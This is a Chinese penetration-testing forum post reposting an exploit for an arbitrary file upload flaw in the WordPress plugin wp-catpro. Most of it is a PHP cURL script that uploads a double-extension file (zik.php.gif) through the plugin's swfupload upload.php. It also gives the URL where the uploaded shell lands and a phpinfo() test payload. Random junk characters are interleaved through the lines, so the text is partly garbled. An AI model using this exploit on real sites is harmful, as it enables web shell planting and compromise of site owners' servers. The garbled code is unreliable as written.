中国网络渗透测试联盟

标题: WordPress插件wp-catpro任意文件上传 [打印本页]

---

作者: admin    时间: 2013-2-27 20:12
标题: WordPress插件wp-catpro任意文件上传
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

& u$ `& m3 ?* j0 G作者  => Zikou-16
邮箱 => zikou16x@gmail.com
1 \; R- S4 b8 H0 x) ?测试系统 : Windows 7 , Backtrack 5r3
  |. n  |: c/ i; }- ~) D! A% B下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
3 B# k3 t2 f$ L& }+ r####

#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
) U; q/ z) c+ g: q( D! x# ("jpg", "gif", "png")  // Allowed file extensions
, c3 r; l- \# M" I, h8 L6 m) Z# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
  u0 Y) i. T. s# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
5 N; |" m+ ^3 _% }) \7 n------------------

5 D& M" s1 G% C' @. K3 t+ K7 x#=> Exploit
3 D( |5 y/ P5 i/ P; H-----------
<?php
" B( J* u& ~% v3 X
$uploadfile="zik.php.gif";
+ a$ @( w; D# o( n+ n; k$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
! o0 t; P4 k, ]" d2 [curl_setopt($ch, CURLOPT_POST, true);
* O7 P2 D! f: K4 H& j0 ocurl_setopt($ch, CURLOPT_POSTFIELDS,
& v" A( V/ a! M+ S' _2 \array('Filedata'=>"@$uploadfile",
+ E5 p" {& y  u  s'folder'=>'/wp-content/uploads/catpro/'));
$ j& n4 _0 `, ^curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  d$ t1 h& @, `  l! k1 u$postResult = curl_exec($ch);
: [- ^+ F, K5 W3 e; icurl_close($ch);

" `+ s) N$ |3 m0 T& t# q: f' Uprint "$postResult";

- ?( I+ e/ Y* n+ tShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
: m- L- y- d0 v; R  ?>
3 N% C* {' G5 l1 Y; K<?php
2 L. }1 ^6 ^  U# G2 _& D3 n9 m  f9 Ophpinfo();
/ l" R, Q! _. i' ~2 Z?>

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2